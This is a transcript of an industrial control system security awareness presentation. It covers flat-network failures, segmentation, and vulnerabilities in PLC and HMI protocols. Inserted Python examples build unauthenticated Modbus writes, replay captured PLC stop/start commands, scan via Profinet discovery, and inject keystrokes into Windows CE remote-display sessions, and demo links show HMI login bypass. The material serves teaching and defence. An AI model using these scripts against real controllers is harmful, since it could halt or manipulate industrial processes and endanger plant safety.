IC4 Awareness Session (3_20191015-ICS-Awareness.pdf)
Industrial Control & Communication Competence Center (IC4) | Howest – UGent
Education - Research - Consulting: Artificial Intelligence, Blockchain, Cyber Security
October 15th, 2019
Ing. Tijl Deneut, Ing. Tinus Umans

Transcript

Page 1

IC4 Awareness Session
Industrial Control & Communication Competence Center | Howest – UGent, October 15th, 2019
Ing. Tijl Deneut, Ing. Tinus Umans

Page 2

Who am I? Tijl Deneut

▪ Lecturer at Howest University College
• Bruges / Brugge: Applied Computer Science (Toegepaste Informatica), Cyber Crime Professional track

▪ Researcher at Howest & Ghent University
• Currently: Industrial Security

▪ Certificates (among others)
• VMware Certified Professional & IT Academy Instructor
• Cisco Certified Instructor for CCNA1-4 & CCNA Security
• IBM Certified Business Common Associate & Professional on business continuity
• EC-Council Certified Ethical Hacker (CEH/Practical) plus Instructor (CEI)

▪ [email protected]
▪ www.linkedin.com/in/tijldeneut

Page 3

What are “Industrial Control Systems”?

“An ICS is a broad class of command and control networks and systems that are used to support all types of industrial processes.”

They include a variety of system types, including:
• Supervisory Control And Data Acquisition (SCADA) systems,
• Distributed Control Systems (DCS),
• Process Control Systems (PCS),
• Safety Instrumented Systems (SIS),
• smaller control system configurations such as Programmable Logic Controllers (PLCs).

The term “OT” is actually never used on the factory floor. It is only used by IT people to distinguish themselves …

Page 4

Where can I find ICS systems?

Nuclear, Oil & Gas, Transportation, Water, HVAC, Building Automation, Manufacturing, Process Industry, Petrochemical, Food Industry, Discrete Manufacturing, Green Energy, Water Locks, Dams, Stand-alone Machines, Generators, Pharmaceutical

Page 5

What does that look like?

[Diagram: three zones side by side: Office, Supervision Network, Production Network; the latter two are the Industrial Control Systems.]

Page 6

What’s inside?

[Diagram: the same three zones (Office, Supervision Network, Production Network) populated with their components: ERP server, production management systems, corporate IT, WAN; supervision consoles, engineering stations, SCADA servers, historians / logging server; PLCs, HMIs, drives, industrial networks, sensors, robots.]

Page 7

TOPIC FOR TODAY: Lessons Learned From Troubleshooting REAL Companies

Within our project, a lot of ICS factories and companies asked for our help. These are the lessons we’ve learned from real companies, real cases …

Lessons learned will be demonstrated on:

Page 8

FicTile - “We fake your tiles”

Page 9

Introducing our Fake Company

FicTile - “We fake your tiles”

Page 10

Management of Security Vulnerabilities in Industrial Networks

Page 11

Enable Remote Monitoring of Industrial Equipment

[Diagram: the FicTile plant network. Three halls, each with PLCs and an HMI: Presses (10.20.1.0 /16), Furnace (10.20.2.0 /16), Dosing equipment (10.20.3.0 /16), all connected to the Office / datacenter (10.20.0.0 /16).]

Page 12

In Real Life, three major kinds of “problems”

1. Non-human, accidental issues
• And how FicTile “solved” it
2. Human on the job, accidental issues
• And how FicTile “solved” it
3. Human recreational, accidental issues
• And how FicTile “solved” it

Page 13

Scenario 1

Please help: “PLC of dosing equipment goes into stop mode every day at 4 AM”

Tijl Deneut, IT Manager

Page 14

[Diagram: the same FicTile network (Presses 10.20.1.0 /16, Furnace 10.20.2.0 /16, Dosing equipment 10.20.3.0 /16, Office / datacenter 10.20.0.0 /16). Broadcast traffic from the office side, labelled “TCP broadcasts, big TCP window”, reaches every hall.]

PLC continuously goes into stop mode

Page 15

[Diagram: same network, same broadcast traffic from the office side (“TCP broadcasts, big TCP window”).]

PLC continuously goes into stop mode
“Solution”: a new switch that filters out these types of broadcasts

Page 16

Scenario 2

Please help: “Dosing equipment mysteriously goes into error and cannot be restarted”

Tijl Deneut, IT Manager

Page 17

[Diagram: same network. A PLC program labelled PRES-1, meant for the Presses hall, is downloaded to a PLC in the wrong hall (Dosing equipment).]

PLC program downloaded to PLC in wrong hall

Dosing equipment mysteriously goes into error

Page 18

[Diagram: same network, PRES-1 program on the wrong PLC; annotation “OT training to create awareness”.]

Dosing equipment mysteriously goes into error
“Solution”: organize a training to create awareness for PLC programmers

Page 19

Scenario 3

Please help: “USB stick causes a complete shutdown of production”

Tijl Deneut, IT Manager

Page 20

[Diagram: same network; a thumb drive plugged in on the office side.]

Thumb drive causes a shutdown of production

Page 21

[Diagram: same network; annotation “Antivirus installation” on the Office / datacenter side.]

Thumb drive causes a shutdown of production
“Solution”: install a new and expensive antivirus program on the laptop

Page 22

The Real Problem?

The so-called “flat” network

o One “broadcast” domain
o The differences in IP addresses are only on paper: with a /16 mask, 10.20.1.0, 10.20.2.0 and 10.20.3.0 are all the same subnet, 10.20.0.0/16
o Each piece of equipment has a direct connection with any other device
o No opportunity for segmentation in zones or areas
o No control over network traffic

An untrusted network!

- Not safe: bad configurations or errors have an influence on the whole network
- Not secure: illegitimate access is not manageable

Page 23

Some Manufacturers Guidelines

Page 24

The (starting) solution?

Solution: network segmentation

Option 1: put routers in front of each hall, or even each piece of equipment

- Configure traffic control on each router
- Broadcast traffic stops at the router
- Fairly expensive, depending on the network size (industrial routers in particular)
- Additional wiring, depending on the current infrastructure
- In case of migration, each piece of equipment needs to be changed separately

Page 25

Adding Routers

[Diagram: the existing network (Presses 10.20.1.0 /16, Furnace 10.20.2.0 /16, Dosing equipment 10.20.3.0 /16, Office / datacenter 10.20.0.0 /16) with a router placed in front of each hall.]

Page 26

Adding Routers

[Diagram: a router in front of each hall and each hall re-addressed to its own subnet: Presses 192.168.1.0 /24 (hosts 192.168.1.X, .Y), Furnace 192.168.2.0 /24 (192.168.2.X, .Y, .Z), Dosing equipment 192.168.3.0 /24 (192.168.3.X, .Y, .Z). The Office / datacenter stays 10.20.0.0 /16.]

Page 27

The (starting) solution?

Solution: network segmentation

Option 2: use VLANs (logical subdivision on the switch)

- Configure traffic control in one location
- Broadcast traffic is limited to the VLAN
- Switches have to support this (managed switches)
- Needs to be thought through in advance; if necessary change the subnet mask
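The three plans above (flat, routers per hall, VLANs) can be checked rather than argued about. The following is an added example and not code from the deck: it encodes the FicTile addressing as drawn on the slides plus the two segmentation options, and reports which hosts really share a broadcast domain. The host names, the office VLAN ID and the "different third octet means drawn as separate" heuristic are assumptions made for illustration.

```python
"""Does an address plan isolate the halls, or only look like it does?"""
import ipaddress
from collections import defaultdict
from itertools import combinations

# Constructed host plans mirroring the FicTile diagrams (no real inventory).
# Each host is (name, address/mask as written on the plan, L2 segment).
# The segment is what a port actually shares: one value for the flat
# unmanaged switch, the hall behind its router (option 1), or the VLAN ID
# the port is assigned to (option 2).
FLAT = [
    ("presses-plc", "10.20.1.10/16", "flat"),
    ("presses-hmi", "10.20.1.20/16", "flat"),
    ("furnace-plc", "10.20.2.10/16", "flat"),
    ("dosing-plc", "10.20.3.10/16", "flat"),
    ("office-erp", "10.20.0.5/16", "flat"),
]
ROUTED = [  # option 1: a router per hall, halls re-addressed to their own /24
    ("presses-plc", "192.168.1.10/24", "presses"),
    ("presses-hmi", "192.168.1.20/24", "presses"),
    ("furnace-plc", "192.168.2.10/24", "furnace"),
    ("dosing-plc", "192.168.3.10/24", "dosing"),
    ("office-erp", "10.20.0.5/16", "office"),
]
VLANS = [  # option 2: addresses untouched, ports put in VLAN 1000/2000/3000
    ("presses-plc", "10.20.1.10/16", 1000),
    ("presses-hmi", "10.20.1.20/16", 1000),
    ("furnace-plc", "10.20.2.10/16", 2000),
    ("dosing-plc", "10.20.3.10/16", 3000),
    ("office-erp", "10.20.0.5/16", 10),  # office VLAN ID: assumption, not on the slides
]


def broadcast_domains(hosts):
    """Group hosts by L2 segment. A frame to ff:ff:ff:ff:ff:ff (ARP, vendor
    discovery, 255.255.255.255) reaches every host in the same segment, no
    matter what subnet is written on the plan."""
    domains = defaultdict(list)
    for name, _addr, segment in hosts:
        domains[segment].append(name)
    return dict(domains)


def subnet_of(addr):
    """The subnet a host really derives from its own address and mask."""
    return ipaddress.ip_interface(addr).network


def paper_only_pairs(hosts):
    """Pairs drawn as different networks (different third octet) that in fact
    share both the L2 segment and the IP subnet: segmentation on paper only."""
    found = []
    for (na, aa, sa), (nb, ab, sb) in combinations(hosts, 2):
        drawn_apart = aa.split(".")[2] != ab.split(".")[2]
        if drawn_apart and sa == sb and subnet_of(aa) == subnet_of(ab):
            found.append((na, nb))
    return found


def misaligned_pairs(hosts):
    """Pairs in the same IP subnet but different L2 segments. Such hosts ARP for
    each other directly and never get an answer: this is the 'change the subnet
    mask if necessary' caveat of the VLAN option."""
    return [
        (na, nb)
        for (na, aa, sa), (nb, ab, sb) in combinations(hosts, 2)
        if sa != sb and subnet_of(aa) == subnet_of(ab)
    ]


if __name__ == "__main__":
    for label, plan in (("flat", FLAT), ("routers", ROUTED), ("vlans", VLANS)):
        print(label, "broadcast domains:", len(broadcast_domains(plan)),
              "paper-only pairs:", len(paper_only_pairs(plan)),
              "misaligned pairs:", len(misaligned_pairs(plan)))
```

For the flat plan every pair of hosts in different halls is a paper-only pair; the VLAN plan removes all of them but leaves every cross-hall pair misaligned until the masks are changed to /24, which is exactly why option 2 "needs to be thought through in advance".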

Page 28

Configuring VLANs

[Diagram: the existing network (Presses 10.20.1.0 /16, Furnace 10.20.2.0 /16, Dosing equipment 10.20.3.0 /16, Office / datacenter 10.20.0.0 /16), before VLANs are assigned.]

Page 29

Configuring VLANs, option A (requires extensive config)

[Diagram: same addresses, but each hall's ports are placed in their own VLAN: Presses 10.20.1.0 /16 (VLAN ID 1000), Furnace 10.20.2.0 /16 (VLAN ID 2000), Dosing equipment 10.20.3.0 /16 (VLAN ID 3000). One trunk carrying VLAN IDs 1000, 2000 and 3000 links the halls to the Office / datacenter (10.20.0.0 /16).]

Page 30

Configuring VLANs, option B (requires extra cables)

[Diagram: same VLAN assignment (Presses VLAN ID 1000, Furnace VLAN ID 2000, Dosing equipment VLAN ID 3000, trunk towards the Office / datacenter 10.20.0.0 /16); this variant needs additional cabling.]

Page 31

The other upside: Real Life Statistics

We assisted some companies in making this migration, so we have some PRE and POST statistics.

Very common in *all* of these companies: redundant traffic

Page 32

Hacker damage …

And am I safe then? Safer, but not secure!

Tijl Deneut, IT Manager

Page 33

Why ICS security now? Several migrations have happened over time:

• ±15 years ago: all systems still used fieldbus protocols
• There was a movement to Ethernet-based protocols
• ±10 years ago: networking became abundant, everything started to become interconnected
• Engineers / operators / managers connecting to their production devices from everywhere in the company
• ±5 years ago: the age of IoT, Big Data and Industry 4.0
• Engineers / operators / managers want to monitor, manage and connect to their production devices from home

And all this using protocols that were developed 40+ years ago and have zero support for security, authentication, encryption …

Demo: Modbus on Android
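What "zero support for authentication" looks like on the wire, as an added example (not the deck's Android demo): a Modbus/TCP write request built byte by byte, and the parser a monitoring tool would use to flag writes coming from an unexpected host. Modbus/TCP is the protocol the demo uses; the transaction, unit and coil values are made up for illustration.

```python
"""Modbus/TCP frames: nothing in the ADU identifies or authenticates the sender."""
import struct

MBAP_LEN = 7  # transaction id (2) + protocol id (2) + length (2) + unit id (1)
# Function codes that change process state. A monitoring rule should flag any of
# these arriving from a host that is not the engineering station or SCADA server.
WRITE_FUNCTIONS = {5, 6, 15, 16, 22, 23}


def _adu(transaction_id, unit_id, pdu):
    """MBAP header + PDU. The length field counts the unit id plus the PDU."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def build_write_single_coil(transaction_id, unit_id, coil_address, on):
    """Function 05: write one coil. 0xFF00 switches it on, 0x0000 off."""
    return _adu(transaction_id, unit_id,
                struct.pack(">BHH", 0x05, coil_address, 0xFF00 if on else 0x0000))


def build_read_holding_registers(transaction_id, unit_id, start, count):
    """Function 03: read `count` holding registers starting at `start`."""
    return _adu(transaction_id, unit_id, struct.pack(">BHH", 0x03, start, count))


def parse_frame(frame):
    """Decode the MBAP header and function code of any Modbus/TCP ADU.
    Raises ValueError for anything that is not a well-formed Modbus frame."""
    if len(frame) < MBAP_LEN + 1:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:
        raise ValueError("length field %d does not match the frame" % length)
    pdu = frame[MBAP_LEN:]
    function = pdu[0] & 0x7F
    return {
        "tid": tid,
        "unit": unit,
        "function": function,
        "exception": bool(pdu[0] & 0x80),  # bit 7 set by the server: request refused
        "data": pdu[1:],
        "is_write": function in WRITE_FUNCTIONS,
    }


def is_matching_response(request, response):
    """A server answers with the same transaction id, unit and function code
    (with bit 7 added on an exception), which is all the pairing there is."""
    req, rsp = parse_frame(request), parse_frame(response)
    return (req["tid"], req["unit"], req["function"]) == (rsp["tid"], rsp["unit"], rsp["function"])


if __name__ == "__main__":
    req = build_write_single_coil(1, 1, 0x0013, True)
    print(req.hex())  # no credential, no signature, just unit id + function + address + value
    # Constructed server answers: the normal echo, and an exception (code 01, illegal function).
    ok = bytes.fromhex("00010000000601050013ff00")
    refused = bytes.fromhex("000100000003018501")
    print(parse_frame(ok)["is_write"], parse_frame(refused)["exception"])
```

Any host that can open TCP/502 to the PLC can send the first frame; whether it is the SCADA server or a phone on the office Wi-Fi is invisible in the protocol, which is why the segmentation and traffic control from the earlier slides are the only place to enforce it.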

Page 34

Remote access over the internet to ICS networks

World of VNC

Public websites

Page 35

Let’s get into the Hacker Mindset

What does a hacker have at his disposal? The internet!

• Explore the possibilities: https://www.shodan.io/explore
• Free reports: https://www.shodan.io/report/YV9DdaM0 and https://www.shodan.io/report/3HyjE1Lu
• Also for industrial systems: the Shodan ICS map and ICS radar, or the general Shodan map

Page 36

Let’s get into the Hacker Mindset

[Slide compares two snapshots: February 2017 and June 2019]

Page 37

Management of Security Vulnerabilities in Industrial Networks

“Hackers on our network”: what can they do?

Tijl Deneut, IT Manager

Page 38

Let’s get into the Hacker Mindset

Industrial networks have some serious security drawbacks:

• Open and insecure protocols
• The only supported software is outdated
• Life expectancy and updates
• Slow or non-existent remediation of security issues
• Hard to get hardware, so not well researched … (“security by obscurity” has a new meaning)

Let’s take a look at some issues that illustrate these drawbacks

Page 39

Protocols, protocols, protocols ☺

Industrial devices rely on old and insecure protocols.

So we did some research to investigate these protocols …

- Phoenix Contact: completely proprietary, not even Wireshark has any idea what we are dealing with

Page 40

Research? How?

• Downloading the original software
• Usually demo versions, freely downloadable
• Connecting to the PLC
• Usually more or less just entering the IP address
• Or sometimes not even that
• Start Wireshark
• Click “Stop”, click “Reset”, click “Cold”
• Replay the captured traffic using Python
• Done …

Demo: Stop & Start Phoenix Contact
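The replay step of the procedure above, as an added example that is not the deck's Phoenix Contact script: the captured requests and responses are copied out of Wireshark as hex streams, sent over one TCP session, and each answer compared with what the capture showed. The bytes in CAPTURE are placeholders and not the Phoenix Contact protocol, and the FakeDevice class stands in for the PLC so the script runs offline. Replaying a real "Stop" against a production controller halts the process; this belongs on a test bench.

```python
"""Replay requests captured with Wireshark and check the device still answers the same way."""
import socket
import threading

# Constructed capture in Wireshark "Copy as Hex Stream" form, as (direction, hex).
# Placeholder bytes for illustration only; not the Phoenix Contact protocol.
CAPTURE = [
    ("c2s", "01000004deadbeef"),  # placeholder request ("stop")
    ("s2c", "010000010a"),        # placeholder acknowledgement
    ("c2s", "02000004cafebabe"),  # placeholder request ("start")
    ("s2c", "020000010a"),
]


def pair_exchanges(capture):
    """Turn the capture into (request, expected_response) pairs, in order.
    A request the capture shows no reply to gets expected_response None."""
    pairs, pending = [], None
    for direction, hexstream in capture:
        data = bytes.fromhex(hexstream)
        if direction == "c2s":
            if pending is not None:
                pairs.append((pending, None))
            pending = data
        elif pending is not None:
            pairs.append((pending, data))
            pending = None
    if pending is not None:
        pairs.append((pending, None))
    return pairs


def replay(capture, host, port, timeout=2.0):
    """Open one TCP session, send every captured request in turn and compare the
    answer with the captured one. Returns one result dict per request."""
    results = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for request, expected in pair_exchanges(capture):
            s.sendall(request)
            got = b""
            if expected is not None:
                try:
                    while len(got) < len(expected):
                        chunk = s.recv(4096)
                        if not chunk:
                            break
                        got += chunk
                except socket.timeout:
                    pass  # device stayed silent: reported as a mismatch below
            results.append({"request": request, "expected": expected,
                            "got": got, "match": got == expected})
    return results


class FakeDevice(threading.Thread):
    """Stand-in for the controller: answers each known request with its captured
    reply, so the replay logic can be exercised without touching real equipment."""

    def __init__(self, capture):
        super().__init__(daemon=True)
        self.table = {req: rsp for req, rsp in pair_exchanges(capture) if rsp is not None}
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]

    def run(self):
        conn, _ = self.sock.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(self.table.get(data, b"\xff"))  # 0xff: "unknown request"


if __name__ == "__main__":
    device = FakeDevice(CAPTURE)
    device.start()
    for r in replay(CAPTURE, "127.0.0.1", device.port):
        print(r["request"].hex(), "->", r["got"].hex(), "OK" if r["match"] else "DIFFERENT")
```

Against real hardware, replace the FakeDevice address with the PLC's IP and the port seen in the capture; a mismatch usually means the protocol carries a session or sequence field that has to be tracked rather than replayed verbatim.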

Page 41

Discovery?

➢ Many ICS vendors (including Schneider, Beckhoff, Siemens …) use a custom discovery implementation
➢ So always use the technology as provided by the manufacturer
- It is a proven system which always works ☺
- These tools exist for about every OEM
➢ An example: the Siemens Primary Setup Tool (or PRONETA or TIA Portal)
- It scans the network for Siemens devices
- And uses a pretty simple protocol to do so: Profinet DCP (Discovery and basic Configuration Protocol), the Profinet discovery protocol
➢ As it turns out, there is somewhat of an issue with the Profinet discovery protocol
- We did some research …

Demo: FullSiemensScan.py
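An added example (not FullSiemensScan.py) of the discovery traffic the Primary Setup Tool sends: a PN-DCP "Identify All" request, and a decoder for the identify responses, which hand the station name, vendor/device ID, IP parameters and device role to anyone on the same L2 segment, with no authentication involved. The bytes in SAMPLE_RESPONSE are constructed for the offline demo; sending the request for real needs a raw socket on Linux with CAP_NET_RAW (the identify_on_wire function).

```python
"""Profinet DCP Identify-All request builder and identify-response decoder."""
import socket
import struct
import time

PN_MULTICAST = bytes.fromhex("010ecf000000")  # DCP identify multicast MAC
ETHERTYPE_PN = 0x8892
FRAME_ID_IDENT_REQ, FRAME_ID_IDENT_RSP = 0xFEFE, 0xFEFF
SERVICE_IDENTIFY = 0x05
SERVICE_TYPE_REQUEST, SERVICE_TYPE_RESPONSE = 0x00, 0x01


def build_identify_all(src_mac, xid=0x01020304, response_delay=1):
    """Identify request with the All/All selector: every Profinet device on the
    segment answers with its identity. No credentials exist in this exchange."""
    block = struct.pack(">BBH", 0xFF, 0xFF, 0)  # option All, suboption All, block length 0
    dcp = struct.pack(">HBBIHH", FRAME_ID_IDENT_REQ, SERVICE_IDENTIFY,
                      SERVICE_TYPE_REQUEST, xid, response_delay, len(block)) + block
    frame = PN_MULTICAST + src_mac + struct.pack(">H", ETHERTYPE_PN) + dcp
    return frame + b"\x00" * max(0, 60 - len(frame))  # pad to minimum Ethernet size


def parse_identify_response(frame):
    """Pull the interesting fields out of an identify response. Each DCP block is
    option, suboption, length, 2 bytes BlockInfo, payload, padded to even length."""
    if struct.unpack(">H", frame[12:14])[0] != ETHERTYPE_PN:
        raise ValueError("not a Profinet frame")
    frame_id, service, stype, xid, _res, dcp_len = struct.unpack(">HBBIHH", frame[14:26])
    if (frame_id, service, stype) != (FRAME_ID_IDENT_RSP, SERVICE_IDENTIFY, SERVICE_TYPE_RESPONSE):
        raise ValueError("not an identify response")
    info = {"src_mac": frame[6:12].hex(":"), "xid": xid}
    body = frame[26:26 + dcp_len]
    pos = 0
    while pos + 4 <= len(body):
        option, suboption, blen = struct.unpack(">BBH", body[pos:pos + 4])
        payload = body[pos + 6:pos + 4 + blen]  # skip the 2-byte BlockInfo
        pos += 4 + blen + (blen & 1)
        if (option, suboption) == (2, 2):
            info["name_of_station"] = payload.decode("ascii", "replace")
        elif (option, suboption) == (2, 1):
            info["device_vendor"] = payload.decode("ascii", "replace")
        elif (option, suboption) == (2, 3) and len(payload) >= 4:
            info["vendor_id"], info["device_id"] = struct.unpack(">HH", payload[:4])
        elif (option, suboption) == (2, 4) and len(payload) >= 1:
            info["device_role"] = payload[0]
        elif (option, suboption) == (1, 2) and len(payload) >= 12:
            info["ip"], info["netmask"], info["gateway"] = (
                ".".join(str(b) for b in payload[i:i + 4]) for i in (0, 4, 8))
    return info


def identify_on_wire(iface, timeout=2.0):
    """Linux only, needs CAP_NET_RAW: send the request on `iface` and collect
    whatever answers within `timeout` seconds. Not used by the offline demo."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETHERTYPE_PN))
    s.bind((iface, 0))
    s.send(build_identify_all(s.getsockname()[4]))
    s.settimeout(0.2)
    found, deadline = [], time.time() + timeout
    while time.time() < deadline:
        try:
            found.append(parse_identify_response(s.recv(2048)))
        except (socket.timeout, ValueError):
            continue
    return found


# Constructed identify response (made-up MACs, vendor/device IDs and addresses):
# NameOfStation "plc-presses-1", device ID block, IP 10.20.1.10/255.255.0.0 gw 10.20.1.1, role 1.
SAMPLE_RESPONSE = bytes.fromhex(
    "020000000001" "020000000002" "8892" "feff0501" "01020304" "0000" "0038"
    "0202000f0000706c632d707265737365732d3100"
    "020300060000002a010d"
    "0102000e00010a14010affff00000a140101"
    "0204000400000100")

if __name__ == "__main__":
    print(build_identify_all(bytes.fromhex("020000000001")).hex())
    print(parse_identify_response(SAMPLE_RESPONSE))
```

The same decoder works on a pcap of the Primary Setup Tool scanning a plant network: every response is a device announcing its name and IP configuration to a broadcast domain, which is one more reason the halls should not share one.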

Page 42

An example: Mitsubishi Protocol Analysis

Page 43

Programming a Mitsubishi PLC

Page 44

Scanning for Mitsubishi PLCs

Page 45

Broadcasts? But why?

Many protocols have been created with the ease of the engineers in mind:

• Sending all packets to 255.255.255.255 / FF:FF:FF:FF:FF:FF is easy to use because the workstation and PLC do not have to be in the same subnet to be able to communicate with each other
• So this protocol works “out of the box”
• So there is no need to have a valid IP address on your computer, easy right?
• Unfortunately this also means that all traffic is being delivered to every other device in the network
• Problem anyone?
• Please note: once the workstation and PLC are in the same subnet, TCP is used and a more “regular” (unicast) way of communicating occurs

Page 46

Normal protocol

Page 47

Creating scripts

Conclusion: access to the network is game over for these PLCs

Demo: MitsubishiScan & MitsubishiSetState

Page 48

The issue?

➢ As so often: user friendliness is the big enemy of security
➢ If it is easy to use for the operator/engineer, then it is easy to use for hackers
➢ As an example, let’s look at our GitHub page (https://github.com/tijldeneut)

Page 49

Mitsubishi PLC software is called “GX Works”

Page 50

Other general issue: limited OS support

Page 51

An example of outdated software: “Windows CE”

Windows Embedded Compact

• WinCE 4.0: 2002/01
• WinCE 5.0: 2004/08
• WinCE 6.0: 2006/06
• WinCE 7.0: 2011/03

Retired in 2013.

Microsoft says “do not use”!

Page 52

Windows CE, example: from zero to Remote Code Execution in less than 10 minutes. A reverse engineering example …

Protocol of choice? Microsoft Windows CE (Compact Embedded) Remote Display, CERDisp

Page 53

So what is this protocol?

The CERDisp protocol is used to take over the display of any Windows CE device that is running this service.
→ An example in ICS would be certain Beckhoff PLCs.

From the manual (https://infosys.beckhoff.com/english.php?content=../content/1033/cx9000_hw/html/cx9000_updateimage.htm)

Page 54

Let’s begin … capturing some data

- Starting a normal session, logging in, seeing the desktop …

Page 55

Analyzing the protocol

- Let’s look in detail at some packets. That’s a “banner grab” ☺

Page 56

Analyzing the protocol

- Next packet … We can make a brute forcer ☺

Page 57

Analyzing the protocol - last piece, getting keys

Key sequence == Windows, arrow up, arrow up, enter, T, e, s, t, enter

Captured payload:
00015b0001015b000001260001012600000126000101260000010d0001010d000001100000015400010154000101100000014500010145000001530001015300000154000101540000010d0001010d00

Split per keystroke:
Windows     00015b0001015b00
arrow up    0001260001012600
arrow up    0001260001012600
enter       00010d0001010d00
shift down  00011000
t           0001540001015400
shift up    01011000
e           0001450001014500
s           0001530001015300
t           0001540001015400
enter       00010d0001010d00

Page 58

Analyzing the protocol - last piece, identifying keys

After some “research” (or in other words, trial and error), we made these conclusions:

• 0001+keycode+00 == key down
• 0101+keycode+00 == key up
• (Good) response from server is always ‘03000000’

Where:
• 5b == Winkey
• 10 == shift
• 25 == arrow left, 26 == arrow up, 27 == arrow right, 28 == arrow down
• 12 == space
• 0d == enter
• 62 == 1, 63 == 2, 64 == 3, 65 == 4, …, 69 == 9, 6a == 0
• 41 == a, 42 == b, 43 == c, 44 == d …
→ There seems to be some pattern here: these are the standard Windows virtual-key codes (VK_LWIN = 0x5B, VK_SHIFT = 0x10, VK_RETURN = 0x0D, VK_LEFT..VK_DOWN = 0x25..0x28, letters = 0x41..0x5A). In that table 0x20 is VK_SPACE, 0x12 is VK_MENU (Alt) and 0x60..0x69 are the numpad digits, so the space and digit values found here by trial and error deserve a second check against it.
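The key encoding worked out above, as an added example (not the deck's CERDisplay-ResetDevice.py): it turns a list of keys into the 4-byte events, reproduces the captured byte string for the sequence on the previous slide, decodes a stream back into events, and pushes events over an already established session object while checking for the 03000000 acknowledgement. The session setup and the password exchange are not described on the page and are not implemented here; the named keys in VK are the ones the capture confirmed.

```python
"""Encode and decode CERDisp keystroke events (0001+key+00 down, 0101+key+00 up)."""
KEY_DOWN, KEY_UP = b"\x00\x01", b"\x01\x01"
OK_RESPONSE = bytes.fromhex("03000000")  # the server's acknowledgement seen in the capture
# Named keys with the codes confirmed by the capture (Windows virtual-key codes).
VK = {"win": 0x5B, "shift": 0x10, "enter": 0x0D,
      "left": 0x25, "up": 0x26, "right": 0x27, "down": 0x28}


def key_event(keycode, down):
    """One 4-byte event: 0001+keycode+00 is key down, 0101+keycode+00 is key up."""
    return (KEY_DOWN if down else KEY_UP) + bytes([keycode & 0xFF]) + b"\x00"


def tap(keycode):
    """Press and release."""
    return key_event(keycode, True) + key_event(keycode, False)


def encode_keys(tokens):
    """tokens: named keys from VK or single ASCII letters. A letter uses the
    virtual-key code of its uppercase form (0x41..0x5A); an uppercase token is
    wrapped in shift down / shift up, exactly as the captured 'T' was."""
    out = b""
    for token in tokens:
        if token in VK:
            out += tap(VK[token])
        elif len(token) == 1 and token.isascii() and token.isalpha():
            code = ord(token.upper())
            if token.isupper():
                out += key_event(VK["shift"], True) + tap(code) + key_event(VK["shift"], False)
            else:
                out += tap(code)
        else:
            raise ValueError("no keycode known for %r" % token)
    return out


def decode_events(stream):
    """Split a byte stream into ('down'|'up', keycode) tuples; every event is 4 bytes."""
    if len(stream) % 4:
        raise ValueError("stream is not a whole number of events")
    events = []
    for i in range(0, len(stream), 4):
        prefix, code, tail = stream[i:i + 2], stream[i + 2], stream[i + 3]
        if tail != 0 or prefix not in (KEY_DOWN, KEY_UP):
            raise ValueError("unexpected event %s" % stream[i:i + 4].hex())
        events.append(("down" if prefix == KEY_DOWN else "up", code))
    return events


def send_events(conn, stream):
    """Send the events one at a time over an object with sendall()/recv() that
    already holds an authenticated CERDisp session, and count how many the
    device acknowledged with 03000000. Stops at the first other answer."""
    acked = 0
    for i in range(0, len(stream), 4):
        conn.sendall(stream[i:i + 4])
        if conn.recv(4) != OK_RESPONSE:
            break
        acked += 1
    return acked


if __name__ == "__main__":
    sequence = ["win", "up", "up", "enter", "T", "e", "s", "t", "enter"]
    print(encode_keys(sequence).hex())
```

Because the device executes whatever keystrokes arrive on an accepted session, the encoder is all that separates "remote display" from "remote command execution" once the (client-side, as the next slides show) password check is out of the way.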

Page 59

Let’s send the keys to restart the device using a Python script

Demo: CERDisplay-ResetDevice.py

Page 60

So what do we have now?

We can now scan, enumerate, brute force and sniff this protocol

- However, during this investigation we discovered something very strange:
→ If we use the script to send a WRONG PASSWORD, we get a ‘000000’ response, but the connection is not killed.
→ Turns out that the password verification is on the client side. So it is up to cerhost.exe to stop the connection in case the wrong password is given.
→ So we perform some IDA Pro / debugging fu

Page 61

“Hacking CERDisp”

Demo: CERHost.exe

Page 62

Vendor response to this issue

Page 63

This OS is found not only in industrial environments:

• Old Automated Teller Machines (ATMs)
• Gas station kiosks and payment terminals
• Buses / public transport
• Barcode scanners in stores & shops
• Charging stations for electric cars
• …

CARS?

Page 64

Finally: some examples of security-not-done-right

Page 65

Siemens Vulnerabilities

Siemens is one of the best students in the class:

• They have a dedicated ProductCERT (Cyber Emergency Response Team)
• They respond to our requests fairly quickly
• They fix issues and make proper notes on their website
• https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
• https://cert-portal.siemens.com/productcert/pdf/ssa-884497.pdf → (thanks to Hendrik Derre)

Page 66

Phoenix Contact HMI

In cooperation with Lars De Maesschalck, Michael De Vos and Robbe Vuylsteke

Page 67

The WebVisit software

→ Works by creating a Java applet running on a web server on the PLC.
→ This applet can read and write certain tags from the PLC program to operate the PLC
→ And it can then be opened and run in a browser (e.g. on an HMI device)

- Until 2014 this software was not secure and every single visitor of the website was simply able to interact with the Java applet
- However: in 2014, a version was created with a password implementation
- A total of four passwords can be configured to provide access to the applet
- And in 2017, the most recent version of this software no longer stores clear-text passwords …

Page 68

Demo Overview

- Accessing the HMI without passwords: https://photubias.stackstorage.com/s/G9EEzOeNvI5QeEW
- Performing an unauthenticated password retrieval on the newer version: https://photubias.stackstorage.com/s/2vta8JPq0c6zMtF
- Performing a hash retrieval plus crack: https://photubias.stackstorage.com/s/CboS1iynnX6YVFD
- And finally: ignoring the entire login screen altogether: https://photubias.stackstorage.com/s/CHrrdrsNvkuzwor

Page 69

TwinCAT ADS vulnerabilities - CVE-2019-16871

Ing. Tinus Umans

Page 70

Who am I? Tinus Umans

▪ Engineer Industrial Automation

▪ Researcher at Ghent University, campus Kortrijk
• Industrial Security
• Vision & RFID applications

▪ [email protected]
▪ www.linkedin.com/in/Tinus-Umans

Page 71

More Money, More Security?

• “But security also comes with a price”
• CX9xxx: Windows CE, cheaper, not secure at all
• CX5xxx: Windows 10 LTSC, more expensive
• Let’s find out …

